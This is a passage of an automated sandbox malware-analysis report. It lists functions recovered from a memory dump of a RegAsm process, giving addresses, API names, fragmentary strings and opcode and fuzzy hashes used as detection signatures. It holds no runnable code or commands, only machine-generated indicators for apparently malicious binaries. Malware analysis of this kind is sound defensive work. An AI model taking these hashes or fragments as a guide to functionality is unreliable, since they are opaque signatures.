                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b87b11583e0f5d28605c66e7a394b14b2a4f26a5d78a3762c92f41778c330a8
                          • Instruction ID: 0ae4913aec9e295600022936d99bfbceb1447a60fd068f6f340e7002d317dfad
                          • Opcode Fuzzy Hash: 5b87b11583e0f5d28605c66e7a394b14b2a4f26a5d78a3762c92f41778c330a8
                          • Instruction Fuzzy Hash: 0091F27420C3818FC315CF29C48062EBBE2AFCA314F18D56EE5E597392D639D846CB56
                          Function 00430C61 Relevance: .3, Instructions: 275COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 71f0d4da5a2352beb2b6c0ceaf9223eb13684035c4f0e4fb227e74c50769d2fa
                          • Instruction ID: e2922715faf7c44a3e0b717e72aaf9a004125947f3780c4651a19aee2f074842
                          • Opcode Fuzzy Hash: 71f0d4da5a2352beb2b6c0ceaf9223eb13684035c4f0e4fb227e74c50769d2fa
                          • Instruction Fuzzy Hash: 0BB1E872A04B804FD3158A38C8D53ABBFD2ABD9318F1D8A7DC5DB87387D67994098706
                          Function 0041F3C0 Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50a94d6d73b6983b78caec3925a5b7c191eb7eaf31cd319ae59d333546bd7c28
                          • Instruction ID: a10b34587ad77af6e4c1aeeca4f08b809cfbad60c63f1cc1086a8718c367298d
                          • Opcode Fuzzy Hash: 50a94d6d73b6983b78caec3925a5b7c191eb7eaf31cd319ae59d333546bd7c28
                          • Instruction Fuzzy Hash: 6C814C32A042615FC712CE28888079BBBD1AB95364F19C27ED8B98B3D2D675DC4BD3C1
                          Function 0042FAD8 Relevance: .3, Instructions: 254COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 927581d324afb18b2a02b58fefe90dce27eee103f4ab43400879cd86b6add9e2
                          • Instruction ID: b53451a0af14f8966e8f2fee35abc999af8fdd0b5a00149c6331512bc9f799b9
                          • Opcode Fuzzy Hash: 927581d324afb18b2a02b58fefe90dce27eee103f4ab43400879cd86b6add9e2
                          • Instruction Fuzzy Hash: A6A14A72608B804FD3158B38D4953ABBFE1AF96308F98887DC9CB47346D579A449C716
                          Function 004335B0 Relevance: .2, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 23980842b447fe10a91259d9c8b47e55dbd1e9b9be0b3422651121edf8911a80
                          • Instruction ID: 6de7fb94a5ff35423c8dd22adfe711f85252a9e5728d6fed225c5747c12ab5de
                          • Opcode Fuzzy Hash: 23980842b447fe10a91259d9c8b47e55dbd1e9b9be0b3422651121edf8911a80
                          • Instruction Fuzzy Hash: 98612D26B4DA915BC32C5E3C4C223B97A834B9A335F2D936FE5F24B3E1C64D4A024359
                          Function 0040E911 Relevance: .2, Instructions: 214COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: e0e7f29c9d4574c10ef8c86b6e3f345a40110ce0b8b630d1dd0d4f1f21e72020
                          • Instruction ID: 88eb34010b5fa47e1c25940ef64784a295cf2587a9aa0a2bbbb0f70812c1c5cb
                          • Opcode Fuzzy Hash: e0e7f29c9d4574c10ef8c86b6e3f345a40110ce0b8b630d1dd0d4f1f21e72020
                          • Instruction Fuzzy Hash: 505105357093804BE395D71BD88136B7683ABD4310F2ECC3DD289A73A5DB7A4C12475A
                          Function 0040D392 Relevance: .2, Instructions: 208COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4dad0c9aa33d29f89da7ddf1a103604b2576d04cc39ba91dbcb2c7ad8d737b53
                          • Instruction ID: 269e560f306471dbf4f926d556c214c1b8d4480078134a9f80052ffa7697792d
                          • Opcode Fuzzy Hash: 4dad0c9aa33d29f89da7ddf1a103604b2576d04cc39ba91dbcb2c7ad8d737b53
                          • Instruction Fuzzy Hash: 87610772E183918BD324CB29CC4179FB6E29FD5304F1AC93ED4C8A7385EA7D48058B86
                          Function 00433820 Relevance: .2, Instructions: 200COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d8560b928c5a5c0cc8f00d126c2ef8fb1b8e7dd857e1b8a84be30a049a0e531
                          • Instruction ID: a0732d9c9d085ed6869b74047dd4be97526dd091a26a9219937288e5a4e76cc4
                          • Opcode Fuzzy Hash: 0d8560b928c5a5c0cc8f00d126c2ef8fb1b8e7dd857e1b8a84be30a049a0e531
                          • Instruction Fuzzy Hash: 65511537B59A9047D3289D3C5C5236A6A830FDB235F3CD36EA5F18B3E1C56D8A064249
                          Function 00431790 Relevance: .2, Instructions: 199COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b95774c77e6187e042d6b6789570a099a14084d567ba6b57b9baf91a8d41822
                          • Instruction ID: 514272f347bebea500bc6b47991b28c5d4c97069002e6be39b5fea5bff12fb23
                          • Opcode Fuzzy Hash: 8b95774c77e6187e042d6b6789570a099a14084d567ba6b57b9baf91a8d41822
                          • Instruction Fuzzy Hash: 68512826A4D9D047E32D5A3C5C6037A6A824F9B334F2DA77FD5F2473F1C54A4806835A
                          Function 00404880 Relevance: .2, Instructions: 190COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5db9934ff1273962913b1394ac0c6e4b3ddb1b8b20ada0cd99333b0f25a5a3f
                          • Instruction ID: e2098fc68c47c9cf92a7bc2e2230b80980739b89541d4611e446bb22ca149771
                          • Opcode Fuzzy Hash: e5db9934ff1273962913b1394ac0c6e4b3ddb1b8b20ada0cd99333b0f25a5a3f
                          • Instruction Fuzzy Hash: C871CC79618702CFDB08CF28E85139A77E0FB8A355F05897DE88487282C7B9C955CF95
                          Function 00438650 Relevance: .2, Instructions: 189COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 066fc37291c9f9dd355c26c9b3030ec2df02353854a1d19a01af866dc0a88e35
                          • Instruction ID: c1989c0424295da11f0c031adcb749d92472a1ee12e930c38cdc76f637e1cfea
                          • Opcode Fuzzy Hash: 066fc37291c9f9dd355c26c9b3030ec2df02353854a1d19a01af866dc0a88e35
                          • Instruction Fuzzy Hash: A5516CB15087548FE314DF29D89435BFBE1BBC8318F444A2EE4E987350E779DA088B96
                          Function 0042C1F0 Relevance: .1, Instructions: 125COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a72ec5854972c82a6171acf6841bcfc3108c68ed06db64fba700098dff25ceeb
                          • Instruction ID: 8c8bdc24d3549e41509688f94ef0cf71c9f2749fc9add468a239212c5bf19404
                          • Opcode Fuzzy Hash: a72ec5854972c82a6171acf6841bcfc3108c68ed06db64fba700098dff25ceeb
                          • Instruction Fuzzy Hash: 12316BB3E14A3C0BD7184D2DAC1523A76825BD9151F8E83BEEC6A9F3C6DE349C1592D0
                          Function 0043BE60 Relevance: .1, Instructions: 108COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4bf6699087bbf7a6d6c4653a0dd2fa23076d8b5e6d205b49212875ad22c7155
                          • Instruction ID: 48c9e24cb2200fcc0e25af041a8aa1bf8f2a9d158c49a0d10325f95c94b96655
                          • Opcode Fuzzy Hash: d4bf6699087bbf7a6d6c4653a0dd2fa23076d8b5e6d205b49212875ad22c7155
                          • Instruction Fuzzy Hash: C63104719093189BD310CF29C88176BBBE5EB8A718F14E82EF5849B351C3798C45CBDA
                          Function 00440F70 Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 78b514eef3afd0df77dda156a2d91060ae23887dc0d964014c2cb157f55a0147
                          • Instruction ID: 52315a03ae529bc232a045b8247879fa47a50522d5bb2847ccda9ee888832213
                          • Opcode Fuzzy Hash: 78b514eef3afd0df77dda156a2d91060ae23887dc0d964014c2cb157f55a0147
                          • Instruction Fuzzy Hash: C221BB75B002415BE7248F24DC8176BB7A2EBC6308F28842EE58087361EA3888948749
                          Function 004268D0 Relevance: .1, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b72ffd91817de40dc7ff1f755b9dba7a4cdff64d013270f82d1e06fe7044470
                          • Instruction ID: 7491acd7365994fd6c89b93442619508014aed4e0c8f741bbe8d9d8ed6016634
                          • Opcode Fuzzy Hash: 7b72ffd91817de40dc7ff1f755b9dba7a4cdff64d013270f82d1e06fe7044470
                          • Instruction Fuzzy Hash: 5211273570A250DFC7048F65E890637B3A2FBE6351FA9183DE4C557222C731AC82CB49
                          Function 0040D80D Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b28183ed16e64fd98bd1c6a86776c3e4061195dd9106b9943ef16c6bbe5484b
                          • Instruction ID: 9319b3026bf4e4a7ba7438ba5bf4c43f7891aadc3dbee6151d0fe5fcef6d3aee
                          • Opcode Fuzzy Hash: 4b28183ed16e64fd98bd1c6a86776c3e4061195dd9106b9943ef16c6bbe5484b
                          • Instruction Fuzzy Hash: 0B213536E053404BE354DB59C84273BB3A3AFC2310F28D82DD19AA3291DB799C05874A
                          Function 00435CC0 Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                          • Instruction ID: 50183f55b98076c03bd49f0a2014896b20a3f1acca777c09a71f4c64768d4c09
                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                          • Instruction Fuzzy Hash: F6114833A055D00EC3168D3C8444566BFA30AA7234F6DD39AF4F99B2D2D6278D8B8369
                          Function 0042B4E0 Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0a84b9b61d851313882d9d7b316dd99cbb60904fbe9ae12bebbb479acf459418
                          • Instruction ID: f39deade79a72ed3f2939cd8683ac6fdec1403282a7bbbff1acdc67093d58b8a
                          • Opcode Fuzzy Hash: 0a84b9b61d851313882d9d7b316dd99cbb60904fbe9ae12bebbb479acf459418
                          • Instruction Fuzzy Hash: 86019EB570071557DB20AE15A5C1B3BA3A8AF8070CF08443EE8585B342EB79EC44C6E9
                          Function 0043BFA0 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6041cb18e6bce519b16fa37d96830bf08c436fe0e3d6a7e7f2d480a583b4630c
                          • Instruction ID: ec01a0e0fee430ee58b55ac0bd9fcf193403e400b5a5769c19df84137b34a8ae
                          • Opcode Fuzzy Hash: 6041cb18e6bce519b16fa37d96830bf08c436fe0e3d6a7e7f2d480a583b4630c
                          • Instruction Fuzzy Hash: 370149787412448BD2359A92ACC067B7776DBDA358F2DA02EE0801B305C3799C42839D
                          Function 00405917 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6bada103e8df8d443a5f81c007e34c84ace77ecfd7b17b614b8854b519b0417
                          • Instruction ID: be4f3a0677314526c122ec39d1a799f4d03a4cb6b58dd195d0ef49ab6c3f88a7
                          • Opcode Fuzzy Hash: a6bada103e8df8d443a5f81c007e34c84ace77ecfd7b17b614b8854b519b0417
                          • Instruction Fuzzy Hash: CB213B2620E3C09BC3AAC62C54D50AFBEA25EF7100F895D9DF5C21B797C5658858CBA3
                          Function 00419744 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a2a19a0defaac319ff6fe55792d479544da29bbb44c4db1b98aba8564f5d604
                          • Instruction ID: b2ebf36d22e2a41749e48d01f3f49f6bf2fd68077508d70867c63aa75fb688dd
                          • Opcode Fuzzy Hash: 4a2a19a0defaac319ff6fe55792d479544da29bbb44c4db1b98aba8564f5d604
                          • Instruction Fuzzy Hash: 61A001A9C4A40A86D6006E116912079A2789217209F063879944A32153A925E158894E
                          Function 00432570 Relevance: 75.4, APIs: 1, Strings: 42, Instructions: 179memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: $"$'$'$)$-$0$6$>$?$A$A$C$E$G$I$K$L$M$O$P$Q$Q$S$U$W$_$a$c$e$g$i$k$m$o$q$s$u$w$y${$}
                          • API String ID: 2525500382-291393788
                          • Opcode ID: a177d922b364630ab37c4dd4cfb045a71fe3f8d0a99fe129229ee6997d2d0db5
                          • Instruction ID: db3e1b687f9932efa72eaabb65e5ec3ef3843f1ea90aacff3f0915add2827a8d
                          • Opcode Fuzzy Hash: a177d922b364630ab37c4dd4cfb045a71fe3f8d0a99fe129229ee6997d2d0db5
                          • Instruction Fuzzy Hash: 81A10C6050C7C1C9E331C77C884879FBEC12BA2218F188AAED5ED9B3D2D7B945498767
                          Function 00432CC9 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 115COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitVariant
                          • String ID: Q$S$U$W$Y$[$]$_$c$i$k$l$m$o
                          • API String ID: 1927566239-3562216331
                          • Opcode ID: 50211271e1c99ce76788ad9006bf59c66bb44dd5518859dfd9f32043893e1780
                          • Instruction ID: 90a7d4eb8ba59978fcc594263df10c6d6fc7304988c9f86d2e6bf0cd9fded501
                          • Opcode Fuzzy Hash: 50211271e1c99ce76788ad9006bf59c66bb44dd5518859dfd9f32043893e1780
                          • Instruction Fuzzy Hash: 4A51397250CBD18AD3218B68884838BFFE15BD6314F098A5DE5E84B396C7B58405CBA3
                          Function 00431DCE Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 111COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitVariant
                          • String ID: Q$S$U$W$Y$[$]$_$c$i$k$l$m$o
                          • API String ID: 1927566239-3562216331
                          • Opcode ID: a5369504cf0198e8bf32a92f774078360ad6567a02e07ad82f097a4ea1d3d2ed
                          • Instruction ID: 0ed101645c6d4b9b3528239ef15dcf78708f22ad3c5c95531bff850463a9d6ff
                          • Opcode Fuzzy Hash: a5369504cf0198e8bf32a92f774078360ad6567a02e07ad82f097a4ea1d3d2ed
                          • Instruction Fuzzy Hash: 7B413E7151C7C18ED3258A7C885939BFFE15BD6324F098A9DE4E48B3D2C6B98409CB63
                          Function 00433C20 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: MetricsSystem
                          • String ID: )AC$4BC$OGC$rAC$AC$CC
                          • API String ID: 4116985748-2515254364
                          • Opcode ID: 846838a6a6e64da16fb8ec6dbc9fb7a5ca4cef9e988fafd5a3bc44f9c63c842c
                          • Instruction ID: 419b3ef7a499297985d7c0f9453ed3ba88ac74ae5315bf5f9b923f327008d1e5
                          • Opcode Fuzzy Hash: 846838a6a6e64da16fb8ec6dbc9fb7a5ca4cef9e988fafd5a3bc44f9c63c842c
                          • Instruction Fuzzy Hash: BF514AB080E3888FE770DF55C58978FBBE0AB85309F10891ED5885B251CBB95549CFAB
                          Function 004329D2 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Variant$ClearInit
                          • String ID: R$S$X$]$a
                          • API String ID: 2610073882-3248165904
                          • Opcode ID: c45a2e07c17d3e93a3eb350d0ab64e796592d65f7b23e6f0af177ed88ba0cd31
                          • Instruction ID: a8abd366158143ff33f687e52d1551ca91a6777b4816fa2a4fb59e0635c276d0
                          • Opcode Fuzzy Hash: c45a2e07c17d3e93a3eb350d0ab64e796592d65f7b23e6f0af177ed88ba0cd31
                          • Instruction Fuzzy Hash: C3513A7250C7D18AC361DB3C888824BBFD19BDA224F594BADF4F4973E2D67485058B53
                          Function 0043310D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 111COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitVariant
                          • String ID: R$S$X$]$a
                          • API String ID: 1927566239-3248165904
                          • Opcode ID: 8739bb9315b60169aef92802809546f43bd6157457b7362c95933b2a5fac6ae6
                          • Instruction ID: 47bec046dcba51f8fbf275b4c6997c8f27df24261d589fecfff2726ef463055f
                          • Opcode Fuzzy Hash: 8739bb9315b60169aef92802809546f43bd6157457b7362c95933b2a5fac6ae6
                          • Instruction Fuzzy Hash: B5515A7250C7C18AC361CB3C888424BBFD15B9B224F584B9EF4F48B3E2C76586068B53